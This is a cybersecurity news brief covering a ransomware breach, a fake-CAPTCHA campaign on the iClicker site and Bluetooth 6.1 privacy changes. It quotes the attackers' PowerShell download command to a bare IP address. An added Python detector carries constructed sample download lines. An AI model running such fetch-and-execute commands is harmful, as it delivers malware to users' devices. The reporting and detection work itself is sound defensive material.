Svoboda Cybersecurity Brief May 12, 2025

May 12, 2025

Data breach exposes Catholic clergy abuse survivors’ information

The Berkeley Research Group (BRG) suffered a ransomware attack on March 2, 2025, potentially exposing sensitive data of diocesan sex abuse survivors involved in bankruptcy lawsuits. Attackers gained access via Microsoft Teams phishing, deployed Chaos ransomware, and were paid an undisclosed ransom despite providing a “destruction log.” The Department of Justice criticized BRG’s delayed notification to affected parties, with some clients only informed on April 28.
Source: DataBreaches

iClicker website compromised to distribute malware via fake CAPTCHA

Between April 12 and 16, 2025, the iClicker student engagement platform’s website was hacked to display a fake CAPTCHA prompting users to execute a PowerShell script (iwr http://67.217.228[.]14:8080). The script delivered malware granting attackers full device access, though some users received a legitimate Microsoft Visual C++ Redistributable as a decoy. iClicker downplayed the incident and obscured its security bulletin with a noindex tag.
Impact: Compromised devices risk credential theft, ransomware, and further network breaches.
Mitigation: Affected users should run security scans, change all passwords, and use a password manager.
Source: BleepingComputer
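
Detection logic for the paste-and-run download described in this item, added here as an example and not part of the original brief or the cited report: it flags PowerShell command lines that fetch from a bare IP address, as the `iwr` one-liner above does. It assumes process-creation command lines as input (for example from Sysmon Event ID 1); the function names and sample lines are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Invoke-WebRequest / Invoke-RestMethod and their aliases (curl and wget are
# aliases of Invoke-WebRequest in Windows PowerShell 5.1).
DOWNLOADER = re.compile(
    r"(?<![\w-])(iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod)(?![\w-])", re.I)
POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
URL = re.compile(r"\bhttps?://[^\s'\"|;)]+", re.I)

def refang(text):
    """Undo common indicator defanging so URLs parse: [.] -> . and hxxp -> http."""
    return re.sub(r"hxxp", "http", text.replace("[.]", "."), flags=re.I)

def check_command(cmdline):
    """Return the reasons a process command line looks like a paste-and-run download."""
    cmd = refang(cmdline)
    if not (POWERSHELL.search(cmd) and DOWNLOADER.search(cmd)):
        return []
    reasons = []
    for raw in URL.findall(cmd):
        try:
            parts = urlsplit(raw)
            ipaddress.ip_address(parts.hostname or "")
            port = parts.port
        except ValueError:
            continue  # named host or unparsable URL: outside this check
        reasons.append(f"download from IP literal {parts.hostname}")
        if parts.scheme.lower() == "http":
            reasons.append("plain HTTP")
        if port not in (None, 80, 443):
            reasons.append(f"non-standard port {port}")
    return reasons

# Constructed command lines (documentation-range addresses), not captured data.
SAMPLES = [
    'powershell.exe -NoProfile -c "iwr http://198.51.100.7:8080/a -OutFile a.ps1"',
    'powershell -c "iwr hxxp://203.0.113[.]5:8080/x"',
    'pwsh -c "Invoke-RestMethod https://192.0.2.20/api"',
    'powershell.exe -c "Invoke-WebRequest https://example.com/setup.msi -OutFile s.msi"',
    "cmd.exe /c ping 192.0.2.10",
]

def triage(lines):
    """Return (command line, reasons) for every line that trips the check."""
    return [(l, r) for l in lines if (r := check_command(l))]

if __name__ == "__main__":
    for line, reasons in triage(SAMPLES):
        print(f"ALERT {line}\n      {'; '.join(reasons)}")
```

Downloads from named hosts are deliberately out of scope here, so this check complements domain reputation and allow-listing rather than replacing them.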

Bluetooth 6.1 introduces randomized RPA timing to enhance privacy

Bluetooth SIG’s Core Specification 6.1 adds randomized Resolvable Private Address (RPA) updates (8-15 mins by default) to mitigate correlation attacks. The update also improves power efficiency by allowing controllers to handle RPA generation autonomously. Hardware adoption is expected by 2026, with full feature rollout likely delayed.
Source: BleepingComputer
